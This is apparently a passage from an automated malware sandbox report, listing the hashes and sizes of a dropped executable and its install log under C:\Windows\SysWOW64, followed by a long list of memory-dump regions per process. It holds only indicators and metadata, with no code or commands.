                                                                                                                                                MD5

                                                                                                                                                e469dda91ae810a1f94c96060f3f8a65

                                                                                                                                                SHA1

                                                                                                                                                0b4b3b0f6f937016b1e045ce5313ee2a65a38630

                                                                                                                                                SHA256

                                                                                                                                                d42fee8db8eb0e047ca53ad59b1c9bc69fe04993be36fec502e3532371908842

                                                                                                                                                SHA512

                                                                                                                                                2eb4037361c03e195c642a53f55a3182a6df19903db503060e366f2394750e64ae04fdaace61ef5a6dba649defc88322d78edd2928bc53ebd1ce11d68cc88dac

                                                                                                                                              • C:\Windows\SysWOW64\WindowsInput.InstallLog

                                                                                                                                                Filesize

                                                                                                                                                597B

                                                                                                                                                MD5

                                                                                                                                                c2291863df7c2d3038ce3c22fa276506

                                                                                                                                                SHA1

                                                                                                                                                7b7d2bc07a6c35523807342c747c9b6a19f3184e

                                                                                                                                                SHA256

                                                                                                                                                14504199bede3f46129969dbd2b7680f2e5b7fcd73a3e427ce1bb6217a6d13da

                                                                                                                                                SHA512

                                                                                                                                                00bf40174a67e3e663d18a887c5b461a1e5ead0b27f0a139d87969158c58f4ca72cfa5a731dda239356192ca4cb5ac6ae2b0e37401d534e686cabacd3cbee8fa

                                                                                                                                              • C:\Windows\SysWOW64\WindowsInput.exe

                                                                                                                                                Filesize

                                                                                                                                                21KB

                                                                                                                                                MD5

                                                                                                                                                e854a4636afc652b320e12e50ba4080e

                                                                                                                                                SHA1

                                                                                                                                                8a4ac6ecc22ee5f3a8ec846d38b41ff18c641fdc

                                                                                                                                                SHA256

                                                                                                                                                94b9c78c6fa2bf61fba20a08ad4563f7dd2f5668c28eff227965ce0a2032d5d5

                                                                                                                                                SHA512

                                                                                                                                                30aabd5079b6ed0948eb70fd18e9166096e4ba5d1d47fc35b7270f931d19bbe6cd929b6010f70297bf5272dc5a79e2523721354d211c4080d68ad8d17e316118

                                                                                                                                              • memory/812-214-0x00007FFD1F4C0000-0x00007FFD1FF81000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                10.8MB

                                                                                                                                              • memory/812-215-0x000001CFDE830000-0x000001CFDE840000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/812-217-0x000001CFDE830000-0x000001CFDE840000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/812-238-0x000001CFC6240000-0x000001CFC6262000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                136KB

                                                                                                                                              • memory/1748-180-0x00007FFD2F820000-0x00007FFD2F84D000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                180KB

                                                                                                                                              • memory/1748-500-0x00007FFD1B8B0000-0x00007FFD1BF88000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                6.8MB

                                                                                                                                              • memory/1748-506-0x00007FFD19B60000-0x00007FFD19CD6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                1.5MB

                                                                                                                                              • memory/1748-501-0x00007FFD33120000-0x00007FFD33145000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                148KB

                                                                                                                                              • memory/1748-111-0x00007FFD1B8B0000-0x00007FFD1BF88000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                6.8MB

                                                                                                                                              • memory/1748-166-0x00007FFD33120000-0x00007FFD33145000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                148KB

                                                                                                                                              • memory/1748-167-0x00007FFD330C0000-0x00007FFD330CF000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                60KB

                                                                                                                                              • memory/1748-186-0x00007FFD330A0000-0x00007FFD330B9000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                100KB

                                                                                                                                              • memory/1748-190-0x00007FFD2F7D0000-0x00007FFD2F7E9000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                100KB

                                                                                                                                              • memory/1748-191-0x00007FFD2F3E0000-0x00007FFD2F413000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                204KB

                                                                                                                                              • memory/1748-193-0x00007FFD2FA90000-0x00007FFD2FA9D000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                52KB

                                                                                                                                              • memory/1748-183-0x00007FFD2F7F0000-0x00007FFD2F814000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                144KB

                                                                                                                                              • memory/1748-211-0x00007FFD1B8B0000-0x00007FFD1BF88000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                6.8MB

                                                                                                                                              • memory/1748-213-0x00007FFD33120000-0x00007FFD33145000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                148KB

                                                                                                                                              • memory/1748-185-0x00007FFD19B60000-0x00007FFD19CD6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                1.5MB

                                                                                                                                              • memory/1748-192-0x00007FFD199E0000-0x00007FFD19AAD000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                820KB

                                                                                                                                              • memory/1748-205-0x00007FFD198C0000-0x00007FFD199DB000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                1.1MB

                                                                                                                                              • memory/1748-204-0x00007FFD2F8C0000-0x00007FFD2F8CD000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                52KB

                                                                                                                                              • memory/1748-248-0x00007FFD2F3E0000-0x00007FFD2F413000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                204KB

                                                                                                                                              • memory/1748-203-0x00007FFD2F670000-0x00007FFD2F684000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                80KB

                                                                                                                                              • memory/1748-249-0x00007FFD199E0000-0x00007FFD19AAD000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                820KB

                                                                                                                                              • memory/1748-201-0x00007FFD16950000-0x00007FFD16E72000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                5.1MB

                                                                                                                                              • memory/1748-240-0x00007FFD16950000-0x00007FFD16E72000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                5.1MB

                                                                                                                                              • memory/1828-247-0x0000020F30920000-0x0000020F30930000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/1828-242-0x00007FFD1F4C0000-0x00007FFD1FF81000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                10.8MB

                                                                                                                                              • memory/1828-246-0x0000020F30920000-0x0000020F30930000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/2760-172-0x00007FF61F870000-0x00007FF6201CC000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                9.4MB

                                                                                                                                              • memory/3212-495-0x00007FF6CE590000-0x00007FF6CEEDF000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                9.3MB

                                                                                                                                              • memory/4048-212-0x0000000000FC0000-0x0000000000FE0000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                128KB

                                                                                                                                              • memory/4048-207-0x00007FFD15B20000-0x00007FFD164C1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                9.6MB

                                                                                                                                              • memory/4048-210-0x0000000000F60000-0x0000000000F78000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                96KB

                                                                                                                                              • memory/4048-221-0x000000001B8A0000-0x000000001B8C4000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                144KB

                                                                                                                                              • memory/4048-310-0x00007FFD15B20000-0x00007FFD164C1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                9.6MB

                                                                                                                                              • memory/4048-241-0x000000001C770000-0x000000001C80C000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                624KB

                                                                                                                                              • memory/4048-327-0x00007FFD1F4C0000-0x00007FFD1FF81000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                10.8MB

                                                                                                                                              • memory/4048-239-0x000000001C200000-0x000000001C6CE000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.8MB

                                                                                                                                              • memory/4048-208-0x0000000000FB0000-0x0000000000FC0000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/4048-328-0x0000014157E10000-0x0000014157E20000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/4048-330-0x0000014157E10000-0x0000014157E20000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/4084-114-0x0000000002A20000-0x0000000002A2A000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                40KB

                                                                                                                                              • memory/4084-361-0x0000000073100000-0x00000000738B0000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                7.7MB

                                                                                                                                              • memory/4084-182-0x0000000005530000-0x0000000005538000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                32KB

                                                                                                                                              • memory/4084-209-0x0000000073100000-0x00000000738B0000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                7.7MB

                                                                                                                                              • memory/4084-170-0x0000000005280000-0x00000000052CC000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                304KB

                                                                                                                                              • memory/4084-165-0x0000000005890000-0x0000000005E34000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                5.6MB

                                                                                                                                              • memory/4084-171-0x00000000052D0000-0x00000000052E0000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/4084-168-0x0000000005580000-0x0000000005612000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                584KB

                                                                                                                                              • memory/4084-218-0x00000000052D0000-0x00000000052E0000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/4084-187-0x0000000005550000-0x000000000555C000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                48KB

                                                                                                                                              • memory/4084-115-0x0000000073100000-0x00000000738B0000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                7.7MB

                                                                                                                                              • memory/4084-323-0x0000000006240000-0x000000000628E000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                312KB

                                                                                                                                              • memory/4084-112-0x0000000000720000-0x00000000007FA000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                872KB

                                                                                                                                              • memory/4084-184-0x0000000005620000-0x0000000005642000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                136KB

                                                                                                                                              • memory/4084-324-0x0000000005870000-0x0000000005888000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                96KB

                                                                                                                                              • memory/4084-178-0x0000000005510000-0x0000000005518000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                32KB

                                                                                                                                              • memory/4688-206-0x00007FFD1F4C0000-0x00007FFD1FF81000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                10.8MB

                                                                                                                                              • memory/4688-101-0x00007FFD1F4C0000-0x00007FFD1FF81000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                10.8MB

                                                                                                                                              • memory/4688-318-0x00007FFD1F4C0000-0x00007FFD1FF81000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                10.8MB

                                                                                                                                              • memory/4688-216-0x0000021110570000-0x0000021110580000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/4688-169-0x0000021110570000-0x0000021110580000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/4688-23-0x000002110E990000-0x000002110E9B2000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                136KB

                                                                                                                                              • memory/5168-340-0x00007FFD1F4C0000-0x00007FFD1FF81000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                10.8MB

                                                                                                                                              • memory/5608-362-0x0000000004B30000-0x0000000004B40000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/5608-360-0x0000000073100000-0x00000000738B0000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                7.7MB

                                                                                                                                              • memory/5608-363-0x0000000005710000-0x0000000005728000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                96KB